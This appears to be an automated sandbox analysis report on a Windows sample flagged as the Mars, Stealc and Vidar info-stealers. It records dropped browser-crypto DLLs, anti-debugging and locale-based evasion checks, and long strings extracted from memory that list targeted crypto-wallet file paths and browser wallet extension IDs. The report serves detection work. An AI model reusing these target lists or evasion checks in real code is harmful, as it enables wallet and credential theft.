Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

API coverage: 6.2 %

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEEDE0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EEEDE0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED1F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EED1F0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF3560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF3560
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEB630 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00EEB630
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EE1600 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EE1600
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEDB90 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00EEDB90
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2B70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00EF2B70
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EEE450 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00EEE450
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF31E0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00EF31E0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EED570 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00EED570
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF2630 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00EF2630

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5DA0 GetSystemInfo,wsprintfA,

0_2_00EF5DA0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EF8BFD

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

0_2_00EF76E0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF75D0 mov eax, dword ptr fs:[00000030h]

0_2_00EF75D0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EE6CD0 memset,RegOpenKeyExA,RegEnumValueA,StrStrA,GetProcessHeap,HeapFree,task,

0_2_00EE6CD0

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EFB5E7 SetUnhandledExceptionFilter,	0_2_00EFB5E7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF8BFD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EF8BFD
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_00EF936E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EF936E
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C50B66C
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C50B1F7
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6BAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C6BAC62

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF7510 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00EF7510

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_6C50B341 cpuid

0_2_6C50B341

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00EF5A60

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5850 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

0_2_00EF5850

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5720 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_00EF5720

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Code function: 0_2_00EF5900 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_00EF5900

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|MetaMask\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|TronLink\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|Binance Wallet\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|0\|0\|Yoroi\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase Wallet extension\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|0\|Jaxx Liberty\|cjelfplplebdjjenllpjcblmjkfcffne\|1\|0\|0\|iWallet\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|MEW CX\|nlbmnnijcnlegkjjpcfjclmcfggfefdm\|1\|0\|0\|GuildWallet\|nanjmdknhkinifnkgdcggcfnhdaammmj\|1\|0\|0\|Ronin Wallet\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CLV Wallet\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|Liquality Wallet\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra Station Wallet\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|Sollet\|fhmfendgdocmcbmfikdcogofphimnkno\|1\|0\|0\|Auro Wallet(Mina Protocol)\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|Polymesh Wallet\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98 Wallet\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain Wallet\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Brave Wallet\|odbfpeeihdkbihmopkbjmoonfanlbfcl\|1\|0\|0\|Oxygen\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|Pali Wallet\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|BOLT X\|aodkkagnadcbobfpggfnjeongemjbjca\|1\|0\|0\|XDEFI Wallet\|hmeobnfnfcmdkdcmlblgagmfpfboieaf\|1\|0\|0\|Nami\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Maiar DeFi Wallet\|dngmlblcodfobpdpecaadgfbcggfjfnm\|1\|0\|0\|Keeper Wallet\|lpilbniiabackdjcionkobglmddfbcjo\|1\|0\|0\|Solflare Wallet\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|Cyano Wallet\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Temple\|ookjlbkiijinhpmnjffcofjonbfbgaoc\|1\|0\|0\|Goby\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|Ronin Wallet\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|Byone\|nlgbhdfgdhgbiamfdfmbikcdghidoadd\|1\|0\|0\|OneKey\|jnmbobjmhlngoefaiojfljckilhhlhcj\|1\|0\|0\|DAppPlay\|lodccjjbdhfakaekdiahmedfbieldgik\|1\|0\|0\|SteemKeychain\|jhgnbkkipaallpehbohjmkbjofjdmeid\|1\|0\|0\|Braavos Wallet\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|kkpllkodjeloidieedojogacfhpaihoh\|1\|1\|1\|OKX Wallet\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender Wallet\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|Eternl\|kmhcihpebfmpgmihbkipmjlmmioameka\|1\|0\|0\|Pontem Aptos Wallet\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Petra Aptos Wallet\|ejjladinnckdgjemekebdpeokbikhfci\|1\|0\|0\|Martian Aptos Wallet\|efbglgofoippbgcjepnhiblaibcnclgk\|1\|0\|0\|Finnie\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra Wallet\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Trezor Password Manager\|imloifkgjagghnncjkhggdhalmcnfklk\|1\|0\|0\|Authenticator\|bhghoamapcdpbohphigoooaddinpkbai\|1\|0\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia 